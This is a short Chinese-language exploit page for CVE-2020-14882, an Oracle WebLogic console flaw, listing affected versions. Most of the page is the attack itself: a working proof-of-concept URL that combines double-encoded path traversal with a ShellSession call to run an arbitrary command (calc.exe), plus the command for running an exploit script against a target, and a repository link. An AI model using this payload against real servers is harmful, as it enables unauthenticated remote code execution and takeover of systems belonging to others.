CVE-2020-14882 EXP 回显
# CVE-2020-14882
## 受影响的版本: 10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0
## POC:
```
http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('calc.exe');");
```
## image:

## EXP:
`python3 CVE-2020-14882.py -u http://XXXXX`
## iamge:


https://github.com/jas502n/CVE-2020-14882
登录后查看神龙缓存的 POC 文件快照
登录查看